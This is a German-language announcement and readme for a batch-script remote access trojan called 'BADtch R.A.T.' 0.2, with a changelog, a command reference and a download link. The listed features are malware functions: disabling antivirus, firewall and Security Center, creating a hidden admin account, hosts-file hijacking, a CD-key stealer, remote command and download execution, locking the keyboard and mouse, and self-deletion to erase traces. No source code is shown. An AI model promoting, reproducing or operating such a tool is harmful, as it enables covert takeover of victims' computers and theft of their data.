Remote Admin Tool (RAT) Code: ## About ##################################################################### # # # Name : [BADtch R.A.T.] 0.2 # # Type : Remote Admin Tool (RAT) # # Lizenz : Freeware # # Coder : Mr Hawk # # Company : [BAD R.A.T.]-Company # # URL : www.bad-rat.de.vu # # Blog : badrat.blog.de # # Email : [email protected] # # # ############################################################################## ## Achtung: ################################################################## # # # Autor kann nicht für eventuelle Schäden zur Verantwortung gezogen werden! # # Jeder ist für sein Handeln selbst verwantwortlich! # # # ############################################################################## Alle Script ist Freeware und darf deswegen nicht für komerzielle Zwecke verwendet werden! [*] = Bug fixed [#] = neu hinzugefügt ToDo (folgendes ist geplant) Funktionen: Icq-Manipulation RemoteIP ermitteln-->IP bannen (beim Script) Mod und Gast Konto für das Script C2C-Chat Vic2C-Chat Multi-Userfähig TCP-Tunnle Reserved-Connection Filemanger Datei suchen Rundll32 mciExecute und SendMessageA (Webcam,Mirco,etc) Zusatz-Scripte: Anonym-Mailer Polymorphe Verschlüsslung IRC-Client Port/Hostscanner Wer mir bei den Funktionen helfen möchte kann sich gerne bei mir melden. Version 0.2 [*] Dos-CMD von 1 auf 8 Parameter erhöht [*] Fav-Auslesen auch bei Pfaden mit Leerzeichen [*] Prüft, ob der Telnet-Server überhaupt da ist [*] Hosthijack-Dateipfad gefixt [*] Das Menü neu geordnet und in Sektionen unterteilt [*] Großen Call-Syntaxfehler ausgemerzt (V 0.1 funktioniert deswegen nicht) [*] Ü/Ä/Ö durch UE/AE/OE ersetzt (Dos interpretiert diese Buchstaben falsch) [*] Script-Notify verbessert [#] Login_cmd-Inject [#] Passwortabfrage für Script [#] Vic-IP auslesen [#] SIN IP/Datum/Zeit/OS/Benutzername/Userdomain [#] IRC-Notify (experimentell) [#] 3 weiter RegStartups [#] lasttools Listet alle letzten Programme auf [#] starturl (url) Oeffnet eine URL [#] makefav (favname)(favurl) erstellt Favorit [#] playme (file) Spielt alles ab (aif,auf,avi,midi,mov,mpeg,sound) [#] stopme (file) Stopt Sound [#] 3dtext ("text")[para_num] 3D-Text-Scr als Standart [1=startet Scr] [#] marquee("text")[para_num] Marquee-Scr als Standart [1=startet Scr] [#] wall ("Pfad") [para_num] Setzt neues Wallpaper [0=zentriert;1=nebeneinander;2=gestreckt] [#] listuin Listet ICQ-UIN auf [#] readuin ICQ-UIN lesen [#] msgbox "msg" Nachrichtfenster [#] beep {delay} Beep {Delay} Serversetup [#] Es gibt erstmal ein Serversetup :o) [#] Autorun.inf wird erstellt Plugins [#] View_Dialogs_Plugin öffnet 47 verschieden Dialog-Fenster [*] Printer_Plugin: HTML-Seite drucken [#] plugin_cdkeystealer [#] plugin_dialogs [#] plugin_kb_code [#] plugin_syscolor [#] plugin_roh [#] plugin_printer Version 0.1 (untested version) - Port,USername,Passwort selber wählen - Startup (Reg und als Service) - Script-Notify - Melt Server - WinXP-FW und Sec-Center ausschalten - AV-Killer - AV-Regdisable - Hosthijack beim Installieren - Sprache (Deutsch,English) - Remote-Desktop freigabe - User Konto mit Adminrechten wird erstellt und versteckt Befehl Beschreibung ddl "(URL)" "(File)" Direktdownload "(URL)" = Quelle im Netz "(File)" = Ziel auf HD myftp Download per FTP fileprop (Datei) Dateieigenschaften inet (num) Internet 1 =Connect 2 =Disconnect userinfo User-Informationen 1=Allgemein 2=Installierte Software 3=Mediaplayerlist 4=Letzte CMDs intscr (Scr-Pfad) Screensaver installieren intinf (INF) (Section) Inf-Datei installieren dklink (Verzeichnis) Desktop-Verknuepfung shutdown (num) Windows 1 = Herunterfahren 2 = Reboot 3 = Abmelden ieset (num) [hjip hjhost] IE Einstellungen 1 = Zeigt Infos 2 = Letzten 20 URLs 3 = alle Fav auflisten 4 = Hosthijack [hjip hjhost] disreg (num) Regedit 1=aktivieren;0=deaktivieren distask (num) Taskmanager 1=aktivieren;0=deaktivieren a2g Admin wird eingeschraenkt shutall schlieszt alle Programme dos (command) Dos-Befehle (CMD) mouse (num) [para_num] Maus_Funktionen 1 = Ausschalten [1=aktivieren;0=deaktivieren] 2 = Button austauschen 3 = setzt Curser nach Links oben 4 = DoubleClickSpeed [para_num] (z.B. 500) 5 = MouseSensitivity [para_num] (z.B. 10) 6 = MouseSpeed [para_num] (z.B. 1) 7 = Button austauschen (bei Neustart) diskey (num) Tastatur 1=aktiviert;0=deaktiviert plug (plugin) startet Plugin-Script selfkill (y) Loescht sich selber und verwischt alle Spuren, Homepage: http://omega2.om.funpic.de/batch/ Download: Code: http://omega2.om.funpic.de/batch/public02.zip
